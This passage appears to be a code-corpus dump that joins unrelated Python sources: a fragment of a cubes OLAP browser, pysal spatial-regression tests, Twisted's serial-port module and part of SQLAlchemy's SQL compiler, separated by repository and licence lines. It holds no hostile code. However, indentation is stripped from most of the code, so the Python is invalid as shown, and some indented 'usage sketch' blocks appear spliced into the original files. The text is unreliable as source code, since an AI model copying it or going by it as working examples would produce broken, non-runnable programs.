action = "/cube/%s/members/%s" % (self.cube.basename, str(dimension))
response = self.store.request(action, params, is_lines=True)
return response
def cell_details(self, cell, dimension=None):
cell = cell or Cell(self.cube)
params = {}
if cell:
params["cut"] = string_from_cuts(cell.cuts)
if dimension:
params["dimension"] = str(dimension)
response = self.store.cube_request("cell", self.cube.basename, params)
return response
def fact(self, fact_id):
action = "/cube/%s/fact/%s" % (self.cube.basename, str(fact_id))
response = self.store.request(action)
return response
def is_builtin_function(self, name, aggregate):
return True
def _order_param(self, order):
"""Prepare an order string in form: ``attribute:direction``"""
string = ",".join("%s:%s" % (o[0], o[1]) for o in order)
return string
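# Hedged usage sketch: how a browser like this is normally obtained and
# queried through a cubes Workspace. The config file and cube name are
# illustrative; see the cubes documentation for the authoritative API.
if __name__ == "__main__":
    from cubes import Workspace
    workspace = Workspace(config="slicer.ini")  # assumed configuration file
    browser = workspace.browser("sales")        # assumed cube name
    result = browser.aggregate(drilldown=["date"])
    print(result.summary)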
| mit |
ljwolf/pysal | pysal/contrib/handler/tests/test_error_sp.py | 6 | 7995 | import unittest
import scipy
import pysal
import numpy as np
from pysal.spreg import error_sp as SP
from pysal.contrib.handler import Model
from functools import partial
GM_Error = partial(Model, mtype='GM_Error')
GM_Endog_Error = partial(Model, mtype='GM_Endog_Error')
GM_Combo = partial(Model, mtype='GM_Combo')
class TestGMError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Error(self.y, self.X, self.w)
betas = np.array([[ 47.94371455], [ 0.70598088], [ -0.55571746], [ 0.37230161]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 27.4739775])
np.testing.assert_allclose(reg.u[0],u,4)
predy = np.array([ 52.9930255])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n,4)
k = 3
np.testing.assert_allclose(reg.k,k,4)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.x[0],x,4)
e = np.array([ 31.89620319])
np.testing.assert_allclose(reg.e_filtered[0],e,4)
predy = np.array([ 52.9930255])
np.testing.assert_allclose(reg.predy[0],predy,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([[ 1.51884943e+02, -5.37622793e+00, -1.86970286e+00], [ -5.37622793e+00, 2.48972661e-01, 5.26564244e-02], [ -1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
np.testing.assert_allclose(reg.vm,vm,4)
sig2 = 191.73716465732355
np.testing.assert_allclose(reg.sig2,sig2,4)
pr2 = 0.3495097406012179
np.testing.assert_allclose(reg.pr2,pr2)
std_err = np.array([ 12.32416094, 0.4989716 , 0.1785863 ])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 3.89022140e+00, 1.00152805e-04], [ 1.41487186e+00, 1.57106070e-01], [ -3.11175868e+00, 1.85976455e-03]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Maximum Likelihood requires SciPy version 11 or newer.")
class TestGMEndogError(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Endog_Error(self.y, self.X, self.yd, self.q, self.w)
betas = np.array([[ 55.36095292], [ 0.46411479], [ -0.66883535], [ 0.38989939]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 26.55951566])
np.testing.assert_allclose(reg.u[0],u,4)
e = np.array([ 31.23925425])
np.testing.assert_allclose(reg.e_filtered[0],e,4)
predy = np.array([ 53.9074875])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n)
k = 3
np.testing.assert_allclose(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531])
np.testing.assert_allclose(reg.x[0],x,4)
yend = np.array([ 15.72598])
np.testing.assert_allclose(reg.yend[0],yend,4)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.z[0],z,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([[ 5.29158422e+02, -1.57833675e+01, -8.38021080e+00],
[ -1.57833675e+01, 5.40235041e-01, 2.31120327e-01],
[ -8.38021080e+00, 2.31120327e-01, 1.44977385e-01]])
np.testing.assert_allclose(reg.vm,vm,4)
pr2 = 0.346472557570858
np.testing.assert_allclose(reg.pr2,pr2)
sig2 = 192.50022721929574
np.testing.assert_allclose(reg.sig2,sig2,4)
std_err = np.array([ 23.003401 , 0.73500657, 0.38075777])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 2.40664208, 0.01609994], [ 0.63144305, 0.52775088], [-1.75659016, 0.07898769]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Maximum Likelihood requires SciPy version 11 or newer.")
class TestGMCombo(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
reg = GM_Combo(self.y, self.X, w=self.w)
e_reduced = np.array([ 28.18617481])
np.testing.assert_allclose(reg.e_pred[0],e_reduced,4)
predy_e = np.array([ 52.28082782])
np.testing.assert_allclose(reg.predy_e[0],predy_e,4)
betas = np.array([[ 57.61123515],[ 0.73441313], [ -0.59459416], [ -0.21762921], [ 0.54732051]])
np.testing.assert_allclose(reg.betas,betas,4)
u = np.array([ 25.57932637])
np.testing.assert_allclose(reg.u[0],u,4)
e_filtered = np.array([ 31.65374945])
np.testing.assert_allclose(reg.e_filtered[0],e_filtered,4)
predy = np.array([ 54.88767685])
np.testing.assert_allclose(reg.predy[0],predy,4)
n = 49
np.testing.assert_allclose(reg.n,n)
k = 4
np.testing.assert_allclose(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_allclose(reg.y[0],y,4)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_allclose(reg.x[0],x,4)
yend = np.array([ 35.4585005])
np.testing.assert_allclose(reg.yend[0],yend,4)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_allclose(reg.z[0],z,4)
my = 38.43622446938776
np.testing.assert_allclose(reg.mean_y,my)
sy = 18.466069465206047
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([ 5.22438333e+02, 2.38012875e-01, 3.20924173e-02,
2.15753579e-01])
np.testing.assert_allclose(np.diag(reg.vm),vm,4)
sig2 = 181.78650186468832
np.testing.assert_allclose(reg.sig2,sig2,4)
pr2 = 0.3018280166937799
np.testing.assert_allclose(reg.pr2,pr2,4)
pr2_e = 0.3561355586759414
np.testing.assert_allclose(reg.pr2_e,pr2_e,4)
std_err = np.array([ 22.85692222, 0.48786559, 0.17914356, 0.46449318])
np.testing.assert_allclose(reg.std_err,std_err,4)
z_stat = np.array([[ 2.52051597e+00, 1.17182922e-02], [ 1.50535954e+00, 1.32231664e-01], [ -3.31909311e+00, 9.03103123e-04], [ -4.68530506e-01, 6.39405261e-01]])
np.testing.assert_allclose(reg.z_stat,z_stat,4)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
kuri65536/python-for-android | python-modules/twisted/twisted/internet/serialport.py | 56 | 1908 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Serial Port Protocol
"""
# http://twistedmatrix.com/trac/ticket/3725#comment:24
# Apparently applications use these names even though they should
# be imported from pyserial
__all__ = ["serial", "PARITY_ODD", "PARITY_EVEN", "PARITY_NONE",
"STOPBITS_TWO", "STOPBITS_ONE", "FIVEBITS",
"EIGHTBITS", "SEVENBITS", "SIXBITS",
# The name this module is actually trying to export
"SerialPort"]
# system imports
import os, sys
# all of them require pyserial at the moment, so check that first
import serial
from serial import PARITY_NONE, PARITY_EVEN, PARITY_ODD
from serial import STOPBITS_ONE, STOPBITS_TWO
from serial import FIVEBITS, SIXBITS, SEVENBITS, EIGHTBITS
# common code for serial ports
class BaseSerialPort:
def setBaudRate(self, baudrate):
if hasattr(self._serial, "setBaudrate"):
self._serial.setBaudrate(baudrate)
else:
self._serial.setBaudRate(baudrate)
def inWaiting(self):
return self._serial.inWaiting()
def flushInput(self):
self._serial.flushInput()
def flushOutput(self):
self._serial.flushOutput()
def sendBreak(self):
self._serial.sendBreak()
def getDSR(self):
return self._serial.getDSR()
def getCD(self):
return self._serial.getCD()
def getRI(self):
return self._serial.getRI()
def getCTS(self):
return self._serial.getCTS()
def setDTR(self, on = 1):
self._serial.setDTR(on)
def setRTS(self, on = 1):
self._serial.setRTS(on)
class SerialPort(BaseSerialPort):
pass
# replace SerialPort with appropriate serial port
if os.name == 'posix':
from twisted.internet._posixserialport import SerialPort
elif sys.platform == 'win32':
from twisted.internet._win32serialport import SerialPort
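# Hedged usage sketch: wiring SerialPort to a protocol. The device name and
# baud rate are illustrative; on Windows a COM port name is used instead.
if __name__ == "__main__":
    from twisted.internet import reactor
    from twisted.protocols.basic import LineReceiver
    class Echo(LineReceiver):
        delimiter = '\n'
        def lineReceived(self, line):
            self.sendLine(line)
    SerialPort(Echo(), '/dev/ttyUSB0', reactor, baudrate=9600)
    reactor.run()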
| apache-2.0 |
codeforamerica/skillcamp | ENV/lib/python2.7/site-packages/sqlalchemy/sql/compiler.py | 76 | 111426 | # sql/compiler.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Base SQL and DDL compiler implementations.
Classes provided include:
:class:`.compiler.SQLCompiler` - renders SQL
strings
:class:`.compiler.DDLCompiler` - renders DDL
(data definition language) strings
:class:`.compiler.GenericTypeCompiler` - renders
type specification strings.
To generate user-defined SQL strings, see
:doc:`/ext/compiler`.
"""
import re
from . import schema, sqltypes, operators, functions, \
util as sql_util, visitors, elements, selectable, base
from .. import util, exc
import decimal
import itertools
import operator
RESERVED_WORDS = set([
'all', 'analyse', 'analyze', 'and', 'any', 'array',
'as', 'asc', 'asymmetric', 'authorization', 'between',
'binary', 'both', 'case', 'cast', 'check', 'collate',
'column', 'constraint', 'create', 'cross', 'current_date',
'current_role', 'current_time', 'current_timestamp',
'current_user', 'default', 'deferrable', 'desc',
'distinct', 'do', 'else', 'end', 'except', 'false',
'for', 'foreign', 'freeze', 'from', 'full', 'grant',
'group', 'having', 'ilike', 'in', 'initially', 'inner',
'intersect', 'into', 'is', 'isnull', 'join', 'leading',
'left', 'like', 'limit', 'localtime', 'localtimestamp',
'natural', 'new', 'not', 'notnull', 'null', 'off', 'offset',
'old', 'on', 'only', 'or', 'order', 'outer', 'overlaps',
'placing', 'primary', 'references', 'right', 'select',
'session_user', 'set', 'similar', 'some', 'symmetric', 'table',
'then', 'to', 'trailing', 'true', 'union', 'unique', 'user',
'using', 'verbose', 'when', 'where'])
LEGAL_CHARACTERS = re.compile(r'^[A-Z0-9_$]+$', re.I)
ILLEGAL_INITIAL_CHARACTERS = set([str(x) for x in range(0, 10)]).union(['$'])
BIND_PARAMS = re.compile(r'(?<![:\w\$\x5c]):([\w\$]+)(?![:\w\$])', re.UNICODE)
BIND_PARAMS_ESC = re.compile(r'\x5c(:[\w\$]+)(?![:\w\$])', re.UNICODE)
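# Hedged illustration (not used by the compiler itself): BIND_PARAMS finds
# ":name" style parameters, while BIND_PARAMS_ESC finds backslash-escaped
# colons that should be emitted literally rather than treated as parameters.
def _example_bind_param_regexes():
    text = r"SELECT * FROM t WHERE a = :a_1 AND b = '\:not_a_param'"
    # expected result: (['a_1'], [':not_a_param'])
    return BIND_PARAMS.findall(text), BIND_PARAMS_ESC.findall(text)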
BIND_TEMPLATES = {
'pyformat': "%%(%(name)s)s",
'qmark': "?",
'format': "%%s",
'numeric': ":[_POSITION]",
'named': ":%(name)s"
}
REQUIRED = util.symbol('REQUIRED', """
Placeholder for the value within a :class:`.BindParameter`
which is required to be present when the statement is passed
to :meth:`.Connection.execute`.
This symbol is typically used when a :func:`.expression.insert`
or :func:`.expression.update` statement is compiled without parameter
values present.
""")
OPERATORS = {
# binary
operators.and_: ' AND ',
operators.or_: ' OR ',
operators.add: ' + ',
operators.mul: ' * ',
operators.sub: ' - ',
operators.div: ' / ',
operators.mod: ' % ',
operators.truediv: ' / ',
operators.neg: '-',
operators.lt: ' < ',
operators.le: ' <= ',
operators.ne: ' != ',
operators.gt: ' > ',
operators.ge: ' >= ',
operators.eq: ' = ',
operators.concat_op: ' || ',
operators.between_op: ' BETWEEN ',
operators.match_op: ' MATCH ',
operators.in_op: ' IN ',
operators.notin_op: ' NOT IN ',
operators.comma_op: ', ',
operators.from_: ' FROM ',
operators.as_: ' AS ',
operators.is_: ' IS ',
operators.isnot: ' IS NOT ',
operators.collate: ' COLLATE ',
# unary
operators.exists: 'EXISTS ',
operators.distinct_op: 'DISTINCT ',
operators.inv: 'NOT ',
# modifiers
operators.desc_op: ' DESC',
operators.asc_op: ' ASC',
operators.nullsfirst_op: ' NULLS FIRST',
operators.nullslast_op: ' NULLS LAST',
}
FUNCTIONS = {
functions.coalesce: 'coalesce%(expr)s',
functions.current_date: 'CURRENT_DATE',
functions.current_time: 'CURRENT_TIME',
functions.current_timestamp: 'CURRENT_TIMESTAMP',
functions.current_user: 'CURRENT_USER',
functions.localtime: 'LOCALTIME',
functions.localtimestamp: 'LOCALTIMESTAMP',
functions.random: 'random%(expr)s',
functions.sysdate: 'sysdate',
functions.session_user: 'SESSION_USER',
functions.user: 'USER'
}
EXTRACT_MAP = {
'month': 'month',
'day': 'day',
'year': 'year',
'second': 'second',
'hour': 'hour',
'doy': 'doy',
'minute': 'minute',
'quarter': 'quarter',
'dow': 'dow',
'week': 'week',
'epoch': 'epoch',
'milliseconds': 'milliseconds',
'microseconds': 'microseconds',
'timezone_hour': 'timezone_hour',
'timezone_minute': 'timezone_minute'
}
COMPOUND_KEYWORDS = {
selectable.CompoundSelect.UNION: 'UNION',
selectable.CompoundSelect.UNION_ALL: 'UNION ALL',
selectable.CompoundSelect.EXCEPT: 'EXCEPT',
selectable.CompoundSelect.EXCEPT_ALL: 'EXCEPT ALL',
selectable.CompoundSelect.INTERSECT: 'INTERSECT',
selectable.CompoundSelect.INTERSECT_ALL: 'INTERSECT ALL'
}
class Compiled(object):
"""Represent a compiled SQL or DDL expression.
The ``__str__`` method of the ``Compiled`` object should produce
the actual text of the statement. ``Compiled`` objects are
specific to their underlying database dialect, and also may
or may not be specific to the columns referenced within a
particular set of bind parameters. In no case should the
``Compiled`` object be dependent on the actual values of those
bind parameters, even though it may reference those values as
defaults.
"""
def __init__(self, dialect, statement, bind=None,
compile_kwargs=util.immutabledict()):
"""Construct a new ``Compiled`` object.
:param dialect: ``Dialect`` to compile against.
:param statement: ``ClauseElement`` to be compiled.
:param bind: Optional Engine or Connection to compile this
statement against.
:param compile_kwargs: additional kwargs that will be
passed to the initial call to :meth:`.Compiled.process`.
.. versionadded:: 0.8
"""
self.dialect = dialect
self.bind = bind
if statement is not None:
self.statement = statement
self.can_execute = statement.supports_execution
self.string = self.process(self.statement, **compile_kwargs)
@util.deprecated("0.7", ":class:`.Compiled` objects now compile "
"within the constructor.")
def compile(self):
"""Produce the internal string representation of this element.
"""
pass
def _execute_on_connection(self, connection, multiparams, params):
return connection._execute_compiled(self, multiparams, params)
@property
def sql_compiler(self):
"""Return a Compiled that is capable of processing SQL expressions.
If this compiler is one, it would likely just return 'self'.
"""
raise NotImplementedError()
def process(self, obj, **kwargs):
return obj._compiler_dispatch(self, **kwargs)
def __str__(self):
"""Return the string text of the generated SQL or DDL."""
return self.string or ''
def construct_params(self, params=None):
"""Return the bind params for this compiled object.
:param params: a dict of string/object pairs whose values will
override bind values compiled in to the
statement.
"""
raise NotImplementedError()
@property
def params(self):
"""Return the bind params for this compiled object."""
return self.construct_params()
def execute(self, *multiparams, **params):
"""Execute this compiled object."""
e = self.bind
if e is None:
raise exc.UnboundExecutionError(
"This Compiled object is not bound to any Engine "
"or Connection.")
return e._execute_compiled(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Execute this compiled object and return the result's
scalar value."""
return self.execute(*multiparams, **params).scalar()
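# Hedged sketch (not part of this module): how user code typically obtains a
# Compiled object and inspects it. Table and column names are illustrative.
def _example_compile_statement():
    from sqlalchemy import MetaData, Table, Column, Integer, select
    t = Table("t", MetaData(), Column("id", Integer))
    compiled = select([t]).where(t.c.id == 5).compile()
    # str(compiled) -> "SELECT t.id FROM t WHERE t.id = :id_1" (dialect-dependent)
    return str(compiled), compiled.params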
class TypeCompiler(object):
"""Produces DDL specification for TypeEngine objects."""
def __init__(self, dialect):
self.dialect = dialect
def process(self, type_):
return type_._compiler_dispatch(self)
class _CompileLabel(visitors.Visitable):
"""lightweight label object which acts as an expression.Label."""
__visit_name__ = 'label'
__slots__ = 'element', 'name'
def __init__(self, col, name, alt_names=()):
self.element = col
self.name = name
self._alt_names = (col,) + alt_names
@property
def proxy_set(self):
return self.element.proxy_set
@property
def type(self):
return self.element.type
class SQLCompiler(Compiled):
"""Default implementation of Compiled.
Compiles ClauseElements into SQL strings. Uses a similar visit
paradigm as visitors.ClauseVisitor but implements its own traversal.
"""
extract_map = EXTRACT_MAP
compound_keywords = COMPOUND_KEYWORDS
isdelete = isinsert = isupdate = False
"""class-level defaults which can be set at the instance
level to define if this Compiled instance represents
INSERT/UPDATE/DELETE
"""
returning = None
"""holds the "returning" collection of columns if
the statement is CRUD and defines returning columns
either implicitly or explicitly
"""
returning_precedes_values = False
"""set to True classwide to generate RETURNING
clauses before the VALUES or WHERE clause (i.e. MSSQL)
"""
render_table_with_column_in_update_from = False
"""set to True classwide to indicate the SET clause
in a multi-table UPDATE statement should qualify
columns with the table name (i.e. MySQL only)
"""
ansi_bind_rules = False
"""SQL-92 doesn't allow bind parameters to be used
in the columns clause of a SELECT, nor does it allow
ambiguous expressions like "? = ?". A compiler
subclass can set this flag to True if the target
driver/DB enforces this.
"""
def __init__(self, dialect, statement, column_keys=None,
inline=False, **kwargs):
"""Construct a new ``DefaultCompiler`` object.
dialect
Dialect to be used
statement
ClauseElement to be compiled
column_keys
a list of column names to be compiled into an INSERT or UPDATE
statement.
"""
self.column_keys = column_keys
# compile INSERT/UPDATE defaults/sequences inlined (no pre-
# execute)
self.inline = inline or getattr(statement, 'inline', False)
# a dictionary of bind parameter keys to BindParameter
# instances.
self.binds = {}
# a dictionary of BindParameter instances to "compiled" names
# that are actually present in the generated SQL
self.bind_names = util.column_dict()
# stack which keeps track of nested SELECT statements
self.stack = []
# relates label names in the final SQL to a tuple of local
# column/label name, ColumnElement object (if any) and
# TypeEngine. ResultProxy uses this for type processing and
# column targeting
self.result_map = {}
# true if the paramstyle is positional
self.positional = dialect.positional
if self.positional:
self.positiontup = []
self.bindtemplate = BIND_TEMPLATES[dialect.paramstyle]
self.ctes = None
# an IdentifierPreparer that formats the quoting of identifiers
self.preparer = dialect.identifier_preparer
self.label_length = dialect.label_length \
or dialect.max_identifier_length
# a map which tracks "anonymous" identifiers that are created on
# the fly here
self.anon_map = util.PopulateDict(self._process_anon)
# a map which tracks "truncated" names based on
# dialect.label_length or dialect.max_identifier_length
self.truncated_names = {}
Compiled.__init__(self, dialect, statement, **kwargs)
if self.positional and dialect.paramstyle == 'numeric':
self._apply_numbered_params()
@util.memoized_instancemethod
def _init_cte_state(self):
"""Initialize collections related to CTEs only if
a CTE is located, to save on the overhead of
these collections otherwise.
"""
# collect CTEs to tack on top of a SELECT
self.ctes = util.OrderedDict()
self.ctes_by_name = {}
self.ctes_recursive = False
if self.positional:
self.cte_positional = []
def _apply_numbered_params(self):
poscount = itertools.count(1)
self.string = re.sub(
r'\[_POSITION\]',
lambda m: str(util.next(poscount)),
self.string)
@util.memoized_property
def _bind_processors(self):
return dict(
(key, value) for key, value in
((self.bind_names[bindparam],
bindparam.type._cached_bind_processor(self.dialect))
for bindparam in self.bind_names)
if value is not None
)
def is_subquery(self):
return len(self.stack) > 1
@property
def sql_compiler(self):
return self
def construct_params(self, params=None, _group_number=None, _check=True):
"""return a dictionary of bind parameter keys and values"""
if params:
pd = {}
for bindparam, name in self.bind_names.items():
if bindparam.key in params:
pd[name] = params[bindparam.key]
elif name in params:
pd[name] = params[name]
elif _check and bindparam.required:
if _group_number:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r, "
"in parameter group %d" %
(bindparam.key, _group_number))
else:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r"
% bindparam.key)
else:
pd[name] = bindparam.effective_value
return pd
else:
pd = {}
for bindparam in self.bind_names:
if _check and bindparam.required:
if _group_number:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r, "
"in parameter group %d" %
(bindparam.key, _group_number))
else:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r"
% bindparam.key)
pd[self.bind_names[bindparam]] = bindparam.effective_value
return pd
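# Usage sketch (reusing the hypothetical ``t`` table from the sketch above):
# construct_params() lays runtime values over the compiled-in defaults, keyed
# by the *compiled* bind name; a required bind with no value raises
# InvalidRequestError as shown above.
#
#     from sqlalchemy import bindparam
#     c = select([t.c.name]).where(t.c.id == bindparam("ident")).compile()
#     c.construct_params({"ident": 7})   # roughly: {'ident': 7}
#     c.construct_params()               # raises: a value is required for 'ident'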
@property
def params(self):
"""Return the bind param dictionary embedded into this
compiled object, for those values that are present."""
return self.construct_params(_check=False)
def default_from(self):
"""Called when a SELECT statement has no froms, and no FROM clause is
to be appended.
Gives Oracle a chance to tack on a ``FROM DUAL`` to the string output.
"""
return ""
def visit_grouping(self, grouping, asfrom=False, **kwargs):
return "(" + grouping.element._compiler_dispatch(self, **kwargs) + ")"
def visit_label(self, label,
add_to_result_map=None,
within_label_clause=False,
within_columns_clause=False,
render_label_as_label=None,
**kw):
# only render labels within the columns clause
# or ORDER BY clause of a select. dialect-specific compilers
# can modify this behavior.
render_label_with_as = within_columns_clause and not within_label_clause
render_label_only = render_label_as_label is label
if render_label_only or render_label_with_as:
if isinstance(label.name, elements._truncated_label):
labelname = self._truncated_identifier("colident", label.name)
else:
labelname = label.name
if render_label_with_as:
if add_to_result_map is not None:
add_to_result_map(
labelname,
label.name,
(label, labelname, ) + label._alt_names,
label.type
)
return label.element._compiler_dispatch(self,
within_columns_clause=True,
within_label_clause=True,
**kw) + \
OPERATORS[operators.as_] + \
self.preparer.format_label(label, labelname)
elif render_label_only:
return labelname
else:
return label.element._compiler_dispatch(self,
within_columns_clause=False,
**kw)
def visit_column(self, column, add_to_result_map=None,
include_table=True, **kwargs):
name = orig_name = column.name
if name is None:
raise exc.CompileError("Cannot compile Column object until "
"its 'name' is assigned.")
is_literal = column.is_literal
if not is_literal and isinstance(name, elements._truncated_label):
name = self._truncated_identifier("colident", name)
if add_to_result_map is not None:
add_to_result_map(
name,
orig_name,
(column, name, column.key),
column.type
)
if is_literal:
name = self.escape_literal_column(name)
else:
name = self.preparer.quote(name)
table = column.table
if table is None or not include_table or not table.named_with_column:
return name
else:
if table.schema:
schema_prefix = self.preparer.quote_schema(table.schema) + '.'
else:
schema_prefix = ''
tablename = table.name
if isinstance(tablename, elements._truncated_label):
tablename = self._truncated_identifier("alias", tablename)
return schema_prefix + \
self.preparer.quote(tablename) + \
"." + name
def escape_literal_column(self, text):
"""provide escaping for the literal_column() construct."""
# TODO: some dialects might need different behavior here
return text.replace('%', '%%')
def visit_fromclause(self, fromclause, **kwargs):
return fromclause.name
def visit_index(self, index, **kwargs):
return index.name
def visit_typeclause(self, typeclause, **kwargs):
return self.dialect.type_compiler.process(typeclause.type)
def post_process_text(self, text):
return text
def visit_textclause(self, textclause, **kw):
def do_bindparam(m):
name = m.group(1)
if name in textclause._bindparams:
return self.process(textclause._bindparams[name], **kw)
else:
return self.bindparam_string(name, **kw)
# un-escape any \:params
return BIND_PARAMS_ESC.sub(lambda m: m.group(1),
BIND_PARAMS.sub(do_bindparam,
self.post_process_text(textclause.text))
)
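# Usage sketch (hypothetical statement text): text() carries ":name" parameters
# which visit_textclause() rewrites through the dialect's bind template, e.g.
#
#     from sqlalchemy import text
#     str(text("SELECT * FROM users WHERE id = :uid").compile())
#     # a named paramstyle keeps ":uid"; a qmark dialect such as SQLite emits "?"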
def visit_text_as_from(self, taf, iswrapper=False,
compound_index=0, force_result_map=False,
asfrom=False,
parens=True, **kw):
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
populate_result_map = force_result_map or (
compound_index == 0 and (
toplevel or \
entry['iswrapper']
)
)
if populate_result_map:
for c in taf.column_args:
self.process(c, within_columns_clause=True,
add_to_result_map=self._add_to_result_map)
text = self.process(taf.element, **kw)
if asfrom and parens:
text = "(%s)" % text
return text
def visit_null(self, expr, **kw):
return 'NULL'
def visit_true(self, expr, **kw):
if self.dialect.supports_native_boolean:
return 'true'
else:
return "1"
def visit_false(self, expr, **kw):
if self.dialect.supports_native_boolean:
return 'false'
else:
return "0"
def visit_clauselist(self, clauselist, order_by_select=None, **kw):
if order_by_select is not None:
return self._order_by_clauselist(
clauselist, order_by_select, **kw)
sep = clauselist.operator
if sep is None:
sep = " "
else:
sep = OPERATORS[clauselist.operator]
return sep.join(
s for s in
(
c._compiler_dispatch(self, **kw)
for c in clauselist.clauses)
if s)
def _order_by_clauselist(self, clauselist, order_by_select, **kw):
# look through raw columns collection for labels.
# note that it's OK we aren't expanding tables and other selectables
# here; we can only add a label in the ORDER BY for an individual
# label expression in the columns clause.
raw_col = set(l._order_by_label_element.name
for l in order_by_select._raw_columns
if l._order_by_label_element is not None)
return ", ".join(
s for s in
(
c._compiler_dispatch(self,
render_label_as_label=
c._order_by_label_element if
c._order_by_label_element is not None and
c._order_by_label_element.name in raw_col
else None,
**kw)
for c in clauselist.clauses)
if s)
def visit_case(self, clause, **kwargs):
x = "CASE "
if clause.value is not None:
x += clause.value._compiler_dispatch(self, **kwargs) + " "
for cond, result in clause.whens:
x += "WHEN " + cond._compiler_dispatch(
self, **kwargs
) + " THEN " + result._compiler_dispatch(
self, **kwargs) + " "
if clause.else_ is not None:
x += "ELSE " + clause.else_._compiler_dispatch(
self, **kwargs
) + " "
x += "END"
return x
def visit_cast(self, cast, **kwargs):
return "CAST(%s AS %s)" % \
(cast.clause._compiler_dispatch(self, **kwargs),
cast.typeclause._compiler_dispatch(self, **kwargs))
def visit_over(self, over, **kwargs):
return "%s OVER (%s)" % (
over.func._compiler_dispatch(self, **kwargs),
' '.join(
'%s BY %s' % (word, clause._compiler_dispatch(self, **kwargs))
for word, clause in (
('PARTITION', over.partition_by),
('ORDER', over.order_by)
)
if clause is not None and len(clause)
)
)
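# Usage sketch (hypothetical column): a window function such as
# func.row_number().over(order_by=t.c.id) renders roughly as
# "row_number() OVER (ORDER BY users.id)" via visit_over() above.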
def visit_extract(self, extract, **kwargs):
field = self.extract_map.get(extract.field, extract.field)
return "EXTRACT(%s FROM %s)" % (field,
extract.expr._compiler_dispatch(self, **kwargs))
def visit_function(self, func, add_to_result_map=None, **kwargs):
if add_to_result_map is not None:
add_to_result_map(
func.name, func.name, (), func.type
)
disp = getattr(self, "visit_%s_func" % func.name.lower(), None)
if disp:
return disp(func, **kwargs)
else:
name = FUNCTIONS.get(func.__class__, func.name + "%(expr)s")
return ".".join(list(func.packagenames) + [name]) % \
{'expr': self.function_argspec(func, **kwargs)}
def visit_next_value_func(self, next_value, **kw):
return self.visit_sequence(next_value.sequence)
def visit_sequence(self, sequence):
raise NotImplementedError(
"Dialect '%s' does not support sequence increments." %
self.dialect.name
)
def function_argspec(self, func, **kwargs):
return func.clause_expr._compiler_dispatch(self, **kwargs)
def visit_compound_select(self, cs, asfrom=False,
parens=True, compound_index=0, **kwargs):
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
self.stack.append(
{
'correlate_froms': entry['correlate_froms'],
'iswrapper': toplevel,
'asfrom_froms': entry['asfrom_froms']
})
keyword = self.compound_keywords.get(cs.keyword)
text = (" " + keyword + " ").join(
(c._compiler_dispatch(self,
asfrom=asfrom, parens=False,
compound_index=i, **kwargs)
for i, c in enumerate(cs.selects))
)
group_by = cs._group_by_clause._compiler_dispatch(
self, asfrom=asfrom, **kwargs)
if group_by:
text += " GROUP BY " + group_by
text += self.order_by_clause(cs, **kwargs)
text += (cs._limit is not None or cs._offset is not None) and \
self.limit_clause(cs) or ""
if self.ctes and \
compound_index == 0 and toplevel:
text = self._render_cte_clause() + text
self.stack.pop(-1)
if asfrom and parens:
return "(" + text + ")"
else:
